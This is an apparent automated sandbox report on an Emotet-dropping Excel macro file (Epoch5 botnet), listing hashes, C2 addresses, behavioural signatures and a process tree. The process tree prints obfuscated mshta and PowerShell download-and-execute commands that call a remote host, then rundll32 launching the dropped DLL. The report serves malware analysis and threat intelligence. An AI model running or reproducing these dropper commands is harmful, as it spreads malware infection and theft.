Analysis

  • max time kernel
    150s
  • max time network
    149s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    18-01-2022 20:40

General

  • Target

    232b0ace6a2a7e19d01426b6e41288d2b789d50da050eb26fbf1b5e076ad452a.xlsm

  • Size

    112KB

  • MD5

    135438c355dc376a0e2bff7572584eff

  • SHA1

    d4b6306dabe42f9fcdcb3e9dcf618eee5bebe37a

  • SHA256

    232b0ace6a2a7e19d01426b6e41288d2b789d50da050eb26fbf1b5e076ad452a

  • SHA512

    15b3433861cb69da8cb190c11c52077ef95c3bcbe1f6fa22e5e8bef01ffbff9bee3551cf267f894008d04ed2372cd48d05752c119a9abc6abb71a946aaaf7e6e

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://92.255.57.195/ru/ru.html

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://92.255.57.195/ru/ru.png

Extracted

Family

emotet

Botnet

Epoch5

C2

45.138.98.34:80

69.16.218.101:8080

51.210.242.234:8080

185.148.168.220:8080

142.4.219.173:8080

54.38.242.185:443

191.252.103.16:80

104.131.62.48:8080

62.171.178.147:8080

217.182.143.207:443

168.197.250.14:80

37.44.244.177:8080

66.42.57.149:443

210.57.209.142:8080

159.69.237.188:443

116.124.128.206:8080

128.199.192.135:8080

195.154.146.35:443

185.148.168.15:8080

195.77.239.39:8080

eck1.plain
ecs1.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • suricata: ET MALWARE W32/Emotet CnC Beacon 3

    suricata: ET MALWARE W32/Emotet CnC Beacon 3

  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 22 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\232b0ace6a2a7e19d01426b6e41288d2b789d50da050eb26fbf1b5e076ad452a.xlsm"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3776
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c m^sh^t^a h^tt^p^:/^/92.255.57.195/ru/ru.html
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2548
      • C:\Windows\system32\mshta.exe
        mshta http://92.255.57.195/ru/ru.html
        3⤵
        • Blocklisted process makes network request
        • Suspicious use of WriteProcessMemory
        PID:2952
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -u -p 2952 -s 1644
          4⤵
          • Program crash
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3736
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://92.255.57.195/ru/ru.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2752
          • C:\Windows\system32\cmd.exe
            "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:3020
            • C:\Windows\SysWow64\rundll32.exe
              C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString
              6⤵
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:1068
              • C:\Windows\SysWOW64\rundll32.exe
                C:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer
                7⤵
                • Loads dropped DLL
                • Drops file in System32 directory
                • Suspicious use of WriteProcessMemory
                PID:2356
                • C:\Windows\SysWOW64\rundll32.exe
                  C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Rslcqd\hffxiqrvwwepw.tcy",uHzLJA
                  8⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2816
                  • C:\Windows\SysWOW64\rundll32.exe
                    C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Rslcqd\hffxiqrvwwepw.tcy",DllRegisterServer
                    9⤵
                    • Blocklisted process makes network request
                    • Suspicious behavior: EnumeratesProcesses
                    PID:1020

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

System Information Discovery

3
T1082

Query Registry

2
T1012

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Public\Documents\ssd.dll
    MD5

    e9968076c97fcb1b320514dd136672e9

    SHA1

    507c092487e345696c8bca48ea4b5094c6ac9427

    SHA256

    f3aebd787132dd78c03ffd81f508827826570d11dc808d4e3cfdd6e504bb8f02

    SHA512

    eb16c5d5e3bd9c25baba575c386b1bfedd1f6b48211cdca0aca8ad7b0bb064c12ddbc3d794b41c34f7365f8555365ddcc89eec4a3363311f6af3ee2521e85fd0

  • \Users\Public\Documents\ssd.dll
    MD5

    e9968076c97fcb1b320514dd136672e9

    SHA1

    507c092487e345696c8bca48ea4b5094c6ac9427

    SHA256

    f3aebd787132dd78c03ffd81f508827826570d11dc808d4e3cfdd6e504bb8f02

    SHA512

    eb16c5d5e3bd9c25baba575c386b1bfedd1f6b48211cdca0aca8ad7b0bb064c12ddbc3d794b41c34f7365f8555365ddcc89eec4a3363311f6af3ee2521e85fd0

  • \Users\Public\Documents\ssd.dll
    MD5

    e9968076c97fcb1b320514dd136672e9

    SHA1

    507c092487e345696c8bca48ea4b5094c6ac9427

    SHA256

    f3aebd787132dd78c03ffd81f508827826570d11dc808d4e3cfdd6e504bb8f02

    SHA512

    eb16c5d5e3bd9c25baba575c386b1bfedd1f6b48211cdca0aca8ad7b0bb064c12ddbc3d794b41c34f7365f8555365ddcc89eec4a3363311f6af3ee2521e85fd0

  • memory/1020-615-0x0000000001100000-0x0000000001128000-memory.dmp
    Filesize

    160KB

  • memory/2356-603-0x00000000010E0000-0x0000000001108000-memory.dmp
    Filesize

    160KB

  • memory/2356-601-0x0000000000A70000-0x0000000000A98000-memory.dmp
    Filesize

    160KB

  • memory/2752-416-0x000001AD33360000-0x000001AD4B510000-memory.dmp
    Filesize

    385.7MB

  • memory/2752-275-0x000001AD332E0000-0x000001AD33302000-memory.dmp
    Filesize

    136KB

  • memory/2752-347-0x000001AD4B460000-0x000001AD4B49C000-memory.dmp
    Filesize

    240KB

  • memory/2752-382-0x000001AD4B900000-0x000001AD4B976000-memory.dmp
    Filesize

    472KB

  • memory/2752-485-0x000001AD33360000-0x000001AD4B510000-memory.dmp
    Filesize

    385.7MB

  • memory/2752-548-0x000001AD33360000-0x000001AD4B510000-memory.dmp
    Filesize

    385.7MB

  • memory/2816-611-0x0000000000C40000-0x0000000000C68000-memory.dmp
    Filesize

    160KB

  • memory/3776-129-0x00007FFD43CA0000-0x00007FFD43CB0000-memory.dmp
    Filesize

    64KB

  • memory/3776-128-0x00007FFD43CA0000-0x00007FFD43CB0000-memory.dmp
    Filesize

    64KB

  • memory/3776-121-0x00007FFD467F0000-0x00007FFD46800000-memory.dmp
    Filesize

    64KB

  • memory/3776-118-0x00007FFD467F0000-0x00007FFD46800000-memory.dmp
    Filesize

    64KB

  • memory/3776-117-0x00007FFD467F0000-0x00007FFD46800000-memory.dmp
    Filesize

    64KB

  • memory/3776-115-0x00007FFD467F0000-0x00007FFD46800000-memory.dmp
    Filesize

    64KB

  • memory/3776-116-0x00007FFD467F0000-0x00007FFD46800000-memory.dmp
    Filesize

    64KB